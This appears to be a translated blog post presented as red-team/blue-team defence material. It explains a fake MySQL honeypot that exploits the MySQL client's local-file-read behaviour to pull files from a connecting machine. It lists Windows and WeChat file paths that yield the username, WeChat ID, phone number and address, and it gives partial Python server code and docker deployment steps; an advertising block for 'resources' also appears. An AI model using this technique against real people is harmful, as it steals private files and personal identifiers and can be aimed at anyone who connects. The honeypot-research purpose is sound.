Relevant statement: The following content is only used in professional fields such as red and blue attack and defense confrontation, please do not use it for illegal purposes.
First of all, let's talk about the concept of honeypot. You can simply understand that a honeypot is a trap, deliberately exposing some of our artificially designed vulnerabilities, allowing attackers to fall into the trap.
1. Introduction of honeypot
Honeypot is a deception technology for attackers to monitor, detect, analyze and trace attack behavior. It has no business purpose. All traffic flowing into/out of honeypot indicates scanning or attack behavior, so it can be better Focus on attack traffic.
Honeypots can actively trap attackers, record many traces in the attacker's attack process in detail, and collect a large amount of valuable data, such as the source code of viruses or worms, hacker operations, etc., so as to provide rich information. Traceability data. In addition, the honeypot can also consume the attacker's time and obtain the attacker's portrait based on JSONP and other methods.
However, honeypots have security risks. If they are not properly isolated, they may become new attack sources.
二、Fake Mysql
Here I will mention the concept of Fake Mysql. By disguising the Mysql server, inducing the attacker to connect, and using the vulnerability to read the file of the attacker's computer, the following content is obtained.
3. Honeypot technology to obtain mobile phone number, WeChat ID and address
So how to obtain the attacker's mobile phone number and WeChat through this technology?
The idea of normal acquisition
Let's first talk about the normal method of reading mobile phone number and WeChat ID, which is divided into the following three steps
- Get the windows username through C:/Windows/PFRO.log
- Get wxid via C:/Users/username/Documents/WeChat Files/All Users/config/config.data
- Obtain the address, WeChat ID, and mobile phone number through C:/Users/username/Documents/WeChat Files/wx_id/config/AccInfo.dat
get windows username
We are here to test on our own computer, open C:/Windows/PFRO.log, you can see that my username is66396
get wxid
Then, we visit C:/Users/ 66396 /Documents/WeChat Files/All Users/config/config.data
Here you can get wxid
Get mobile phone number, WeChat ID, address
Can see the phone number
There are also addresses and WeChat IDs.
The above is the information that can be obtained by viewing the files in the computer after the hacker invades, so how to design a honeypot, so that the hacker can throw himself into the net when attacking, and help our defender trace the information of the attacker?
[→Follow me for all resources, and reply to "data" by private message to get ←]
1. Network security learning route
2. E-books (white hat)
3. Internal video of a big security company4,
100 src documents5
, common security interview questions6
,the classic topics of the ctf competition
7, a full set of toolkits
8, emergency response notes
Fourth, the core code
How to automate the above process? We can see that the code
below the core code has two main functions
- Determine whether it is a scanner or a password blasting tool, and perform an interactive handshake, the effect is that the scanner directly blasts the 3306 weak password.
- If it is a direct connection, read the set file and write it to the local save.
def mysql_get_file_content(filename,conn,address):
logpath = os.path.abspath('.') + "/log/" + address[0]
if not os.path.exists(logpath):
os.makedirs(logpath)
conn.sendall("xxx")
try:
conn.recv(1024000)
except Exception as e:
print(e)
try:
conn.sendall("xx")
res1 = conn.recv(1024000)
# SHOW VARIABLES
if 'SHOW VARIABLES' in res1:
conn.sendall("xxx")
res2 = conn.recv(9999)
if 'SHOW WARNINGS' in res2:
conn.sendall("xxx")
res3 = conn.recv(9999)
if 'SHOW COLLATION' in res3:
conn.sendall("xxx")
res4 = conn.recv(9999)
if 'SET NAMES utf8' in res4:
conn.sendall("xxx")
res5 = conn.recv(9999)
if 'SET character_set_results=NULL' in res5:
conn.sendall("xxx")
conn.close()
else:
conn.close()
else:
conn.close()
else:
conn.close()
else:
try:
wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
conn.sendall(wantfile)
content=''
while True:
data = conn.recv(1024)
print len(data)
content += data
if len(data) < 1024:
print 'ok'
break
conn.close()
item=logpath + "/" + filename.replace("/", "_").replace(":", "")+'_'+str(random.random())
if len(content) > 6:
with open(item, "w") as f:
f.write(content)
f.close()
return (True,content)
else:
return (False,content)
except Exception as e:
print (e)
except Exception as e:
print (e)
In order to prevent the incomplete content of the read file, a whileloop can be added.
while True:
conn, address = sv.accept()
first_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
global files1
global username
global wx_id
file=files1[0].replace('Administrator',username).replace('wx_id',wx_id)
res,content = mysql_get_file_content(file,conn,address)
files1.append(files1[0])
files1.remove(files1[0])
if res:
if 'PFRO' in file:
username = get_username(content)
s= "xx" % (xx)
cursor.execute(s)
data = cursor.fetchall()
if len(data)==0:
s = "XX" % (xx)
cursor.execute(s)
db.commit()
print 'success:'+ file
insert_file(file,address,username)
elif 'config.data'in file:
content = content
wxid = re.findall(r'WeChatFiles\(.*)\config', content)[0]
sql = "xxx" % (xxx)
cursor.execute(sql)
db.commit()
wx_id=wxid
img = qrcode.make('weixin://contacts/profile/'+wxid)
img.save(os.path.abspath('.')+'/static/pic/'+wxid+'.png')
print 'success:'+ file
insert_file(file,address,username)
elif 'AccInfo' in file:
content = content
phone = re.findall(r'[0-9]{11}', content)[-1]
sql = "xxx" % (xxx)
cursor.execute(sql)
db.commit()
print 'success:'+ file
insert_file(file,address,username)
else:
files1=files
username='Administrator'
Deployment method
We need to download the tool first and pass it to the server
Then modify webServer.pythe password of the admin. Of course, you can also change the user name, which is modified according to personal habits.
Then enable the service via docker
Then run this project
docker-compose up -d
Instructions
Attackers usually find some vulnerabilities in our website. We use honeypot technology here to deliberately expose our database. We set weak passwords in our database to allow attackers to connect.
After the attacker successfully uses navicat to connect to our database, we can execute the code and read its mobile phone number, WeChat ID, and address
And you can access the background on port 5000, enter the admin and password fancypig we just set
Then you can see the attacker information! references
